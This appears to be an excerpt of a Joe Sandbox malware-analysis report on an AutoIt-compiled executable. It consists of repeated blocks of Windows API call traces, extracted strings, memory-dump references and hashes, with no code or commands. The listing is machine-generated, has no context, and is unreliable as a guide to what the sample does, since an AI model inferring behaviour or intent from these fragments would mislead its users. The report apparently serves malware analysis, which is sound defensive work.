                                                          • Instruction Fuzzy Hash: 1F8161755043419FCB24EF65C884F6AB7E8AF89314F14483EF89ACB251EB30DA45DB52
                                                          APIs
                                                            • Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CEC1FC
                                                          • GetFocus.USER32 ref: 00CEC20C
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00CEC217
                                                          • _memset.LIBCMT ref: 00CEC342
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00CEC36D
                                                          • GetMenuItemCount.USER32(?), ref: 00CEC38D
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00CEC3A0
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00CEC3D4
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00CEC41C
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CEC454
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CEC489
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 0b1477d08333df2f10feda696798f38ed036f500d8194f1be087f2ce7007eff2
                                                          • Instruction ID: af299d09d1b87e32302cf69aa80bf018048cf157ad774287c06d7f594a6e958f
                                                          • Opcode Fuzzy Hash: 0b1477d08333df2f10feda696798f38ed036f500d8194f1be087f2ce7007eff2
                                                          • Instruction Fuzzy Hash: 3D8191711083919FDB10DF15D8D4A7BBBE8FB88714F00492EF9A5972A1C770D906DB62
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00CD738F
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CD739B
                                                          • CreateCompatibleDC.GDI32(?), ref: 00CD73A7
                                                          • SelectObject.GDI32(00000000,?), ref: 00CD73B4
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CD7408
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CD7444
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CD7468
                                                          • SelectObject.GDI32(00000006,?), ref: 00CD7470
                                                          • DeleteObject.GDI32(?), ref: 00CD7479
                                                          • DeleteDC.GDI32(00000006), ref: 00CD7480
                                                          • ReleaseDC.USER32(00000000,?), ref: 00CD748B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: ba65d11722a5c4aa13b1b8275710d4f6dd13c4d850adedba66e706357dffae0c
                                                          • Instruction ID: b98c132b892d3987a174541917229a16c8a74303057bd6263bdb0d9839818f01
                                                          • Opcode Fuzzy Hash: ba65d11722a5c4aa13b1b8275710d4f6dd13c4d850adedba66e706357dffae0c
                                                          • Instruction Fuzzy Hash: DE515875904249EFCB14CFA8CC85FAEBBB9EF48310F14852EFA5997320D731A9418B50
                                                          APIs
                                                            • Part of subcall function 00C80957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C66B0C,?,00008000), ref: 00C80973
                                                            • Part of subcall function 00C64750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C64743,?,?,00C637AE,?), ref: 00C64770
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C66BAD
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00C66CFA
                                                            • Part of subcall function 00C6586D: _wcscpy.LIBCMT ref: 00C658A5
                                                            • Part of subcall function 00C8363D: _iswctype.LIBCMT ref: 00C83645
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-1018226102
                                                          • Opcode ID: 2175a03960f2dc6a8c27bee60bb3ee50e1b947719f75ffe92da4dddf4056e745
                                                          • Instruction ID: ff3b9a969c3168bbb63098a1dd2ec2cee8b94cf3caf5f9daf5052da15981630f
                                                          • Opcode Fuzzy Hash: 2175a03960f2dc6a8c27bee60bb3ee50e1b947719f75ffe92da4dddf4056e745
                                                          • Instruction Fuzzy Hash: F2029D301083419FCB24EF24C891AAFBBE5FF99314F14491DF496972A2DB31DA49EB52
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CC2D50
                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00CC2DDD
                                                          • GetMenuItemCount.USER32(00D25890), ref: 00CC2E66
                                                          • DeleteMenu.USER32(00D25890,00000005,00000000,000000F5,?,?), ref: 00CC2EF6
                                                          • DeleteMenu.USER32(00D25890,00000004,00000000), ref: 00CC2EFE
                                                          • DeleteMenu.USER32(00D25890,00000006,00000000), ref: 00CC2F06
                                                          • DeleteMenu.USER32(00D25890,00000003,00000000), ref: 00CC2F0E
                                                          • GetMenuItemCount.USER32(00D25890), ref: 00CC2F16
                                                          • SetMenuItemInfoW.USER32(00D25890,00000004,00000000,00000030), ref: 00CC2F4C
                                                          • GetCursorPos.USER32(?), ref: 00CC2F56
                                                          • SetForegroundWindow.USER32(00000000), ref: 00CC2F5F
                                                          • TrackPopupMenuEx.USER32(00D25890,00000000,?,00000000,00000000,00000000), ref: 00CC2F72
                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CC2F7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                          • String ID:
                                                          • API String ID: 3993528054-0
                                                          • Opcode ID: fba49c34a62323bf238f665cb6217187be917c43c6ab8c9baf17114fb72d2262
                                                          • Instruction ID: 1f0b875b2df01a4e51c7098c6db3e46117517368df43070f21475f4b670440e3
                                                          • Opcode Fuzzy Hash: fba49c34a62323bf238f665cb6217187be917c43c6ab8c9baf17114fb72d2262
                                                          • Instruction Fuzzy Hash: CE71E470601219BFEB219F55DC89FAABF64FF04724F14022EF625AA1E1C7B15D10DBA0
                                                          APIs
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          • _memset.LIBCMT ref: 00CB786B
                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00CB78A0
                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00CB78BC
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00CB78D8
                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00CB7902
                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00CB792A
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB7935
                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00CB793A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                          • API String ID: 1411258926-22481851
                                                          • Opcode ID: 172e8600f550492b261d0b2dd578aa7efc0b7586ed7360c8df3150a923d7075a
                                                          • Instruction ID: 0c20dfcf77dd7a936c827f01459d5bdcebf2e1681409aeb0de15aa631f94edc9
                                                          • Opcode Fuzzy Hash: 172e8600f550492b261d0b2dd578aa7efc0b7586ed7360c8df3150a923d7075a
                                                          • Instruction Fuzzy Hash: B8411872C1422DABCF21EBA4DC85DEEB778BF44354F044629F815A71A1DA319E05DB90
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDFDAD,?,?), ref: 00CE0E31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                          • API String ID: 3964851224-909552448
                                                          • Opcode ID: 60dc2aa09ad573aab147a6788c852645946d94ccc734bc0a71e1b6dbb49f3d85
                                                          • Instruction ID: 53b34718772d80a00f35519fdda665ae8f793f7d5f8d296a00490c8413bb3136
                                                          • Opcode Fuzzy Hash: 60dc2aa09ad573aab147a6788c852645946d94ccc734bc0a71e1b6dbb49f3d85
                                                          • Instruction Fuzzy Hash: ED4162351003899BDF24EF51E8A6AEF3764BF11304F640454FCA51B291DB749EAADBE0
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C9E2A0,00000010,?,Bad directive syntax error,00CEF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00CBF7C2
                                                          • LoadStringW.USER32(00000000,?,00C9E2A0,00000010), ref: 00CBF7C9
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          • _wprintf.LIBCMT ref: 00CBF7FC
                                                          • __swprintf.LIBCMT ref: 00CBF81E
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CBF88D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 1506413516-4153970271
                                                          • Opcode ID: 9e8a7d37545002c15ca088973ff0c18acce9a0d57d26f035a18b0b910f4a9cc9
                                                          • Instruction ID: c8a1cf92ee0754c341193ae1d8c7615f9ed509416b7db5b11de934272d37d7cd
                                                          • Opcode Fuzzy Hash: 9e8a7d37545002c15ca088973ff0c18acce9a0d57d26f035a18b0b910f4a9cc9
                                                          • Instruction Fuzzy Hash: 9021653290025DFFCF11EF90DC4AEED7739BF14304F044869F515661A1EA72A659EB50
                                                          APIs
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                            • Part of subcall function 00C67924: _memmove.LIBCMT ref: 00C679AD
                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CC5330
                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CC5346
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CC5357
                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CC5369
                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CC537A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: SendString$_memmove
                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                          • API String ID: 2279737902-1007645807
                                                          • Opcode ID: 9b59d78ee551f955180663eac665342e56be8131f95ec7e3af2d9d6f908a54b1
                                                          • Instruction ID: 281f76fc2056771daaf5f56a4a4aa0adb80b87a8bf30a5f67220a5281e703713
                                                          • Opcode Fuzzy Hash: 9b59d78ee551f955180663eac665342e56be8131f95ec7e3af2d9d6f908a54b1
                                                          • Instruction Fuzzy Hash: 11118231A501697DD720F661DC8AEFFBBBCEBD5B84F140929B411A20E1DEA01D89D9B0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                          • String ID: 0.0.0.0
                                                          • API String ID: 208665112-3771769585
                                                          • Opcode ID: 5fc70542298e8605153f66b3ded532aa32e2d4a971499dc1bd92f67be24b758e
                                                          • Instruction ID: 7ce4cd6e207ad565fbfc07a29507b60f1867b628dd2816b1bfa4cb0e74b72dad
                                                          • Opcode Fuzzy Hash: 5fc70542298e8605153f66b3ded532aa32e2d4a971499dc1bd92f67be24b758e
                                                          • Instruction Fuzzy Hash: 3D11C332900114ABCB28BB30DC8AFDE77ACEB02715F0441BEF84596091EF709A82D754
                                                          APIs
                                                          • timeGetTime.WINMM ref: 00CC4F7A
                                                            • Part of subcall function 00C8049F: timeGetTime.WINMM(?,75C0B400,00C70E7B), ref: 00C804A3
                                                          • Sleep.KERNEL32(0000000A), ref: 00CC4FA6
                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00CC4FCA
                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00CC4FEC
                                                          • SetActiveWindow.USER32 ref: 00CC500B
                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CC5019
                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CC5038
                                                          • Sleep.KERNEL32(000000FA), ref: 00CC5043
                                                          • IsWindow.USER32 ref: 00CC504F
                                                          • EndDialog.USER32(00000000), ref: 00CC5060
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                          • String ID: BUTTON
                                                          • API String ID: 1194449130-3405671355
                                                          • Opcode ID: ba3c05beeb5308b465a82fcbeb6afcfb304abba2cb833c3214443e081815e0a9
                                                          • Instruction ID: 5e2fb817d1392e84384d79365f24cdd9c5ce7cf15425d757378640d2ade4031e
                                                          • Opcode Fuzzy Hash: ba3c05beeb5308b465a82fcbeb6afcfb304abba2cb833c3214443e081815e0a9
                                                          • Instruction Fuzzy Hash: 2C218870200B84AFEB205F60ECC8F2A3B69EBA5745F04502CF501C62B1CB719E829A72
                                                          APIs
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • CoInitialize.OLE32(00000000), ref: 00CCD5EA
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00CCD67D
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00CCD691
                                                          • CoCreateInstance.OLE32(00CF2D7C,00000000,00000001,00D18C1C,?), ref: 00CCD6DD
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00CCD74C
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00CCD7A4
                                                          • _memset.LIBCMT ref: 00CCD7E1
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00CCD81D
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00CCD840
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00CCD847
                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00CCD87E
                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 00CCD880
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                          • String ID:
                                                          • API String ID: 1246142700-0
                                                          • Opcode ID: 258133ccda61612c4a00eaf655f49b58eabf41764b215a08c91f92408dd98159
                                                          • Instruction ID: ef0f4bd9bcf53b9ee8069276b68aabc30b6a455b6d978006033aef348ae03f2a
                                                          • Opcode Fuzzy Hash: 258133ccda61612c4a00eaf655f49b58eabf41764b215a08c91f92408dd98159
                                                          • Instruction Fuzzy Hash: 65B1EC75A00109AFDB14DFA4C888EAEBBB9FF48314F148469F91AEB251DB30ED45DB50
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 00CBC283
                                                          • GetWindowRect.USER32(00000000,?), ref: 00CBC295
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00CBC2F3
                                                          • GetDlgItem.USER32(?,00000002), ref: 00CBC2FE
                                                          • GetWindowRect.USER32(00000000,?), ref: 00CBC310
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00CBC364
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00CBC372
                                                          • GetWindowRect.USER32(00000000,?), ref: 00CBC383
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00CBC3C6
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00CBC3D4
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00CBC3F1
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CBC3FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: 73d448b74c8632d46a93f539b9f6812e62748a09edc014bf7c0d8ea49e28d9d7
                                                          • Instruction ID: 3a73615f8be19bab8a6fd12a5ccfa0dbd0195fe20669c7f75321b6ffe87fd797
                                                          • Opcode Fuzzy Hash: 73d448b74c8632d46a93f539b9f6812e62748a09edc014bf7c0d8ea49e28d9d7
                                                          • Instruction Fuzzy Hash: E2514F71B00205AFDB18CFA9DDD9BAEBBBAEB88710F14812DF515D72A0D7709E018B10
                                                          APIs
                                                            • Part of subcall function 00C61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C62036,?,00000000,?,?,?,?,00C616CB,00000000,?), ref: 00C61B9A
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C620D3
                                                          • KillTimer.USER32(-00000001,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C6216E
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00C9BCA6
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C9BCD7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C9BCEE
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C616CB,00000000,?,?,00C61AE2,?,?), ref: 00C9BD0A
                                                          • DeleteObject.GDI32(00000000), ref: 00C9BD1C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: b080e8d9f0dd33f18f0efa2faa9f99770db4e9a61b8cb23d0b598872f7ea6d12
                                                          • Instruction ID: afa987dd3212039587bc21d8208e46339137e725c66476aaa0c248a67c0074a9
                                                          • Opcode Fuzzy Hash: b080e8d9f0dd33f18f0efa2faa9f99770db4e9a61b8cb23d0b598872f7ea6d12
                                                          • Instruction Fuzzy Hash: B3618B31101B40EFCB359F15EA88B29B7F1FF50312F10842DE5529BA64C7B1AD92DB60
                                                          APIs
                                                            • Part of subcall function 00C625DB: GetWindowLongW.USER32(?,000000EB), ref: 00C625EC
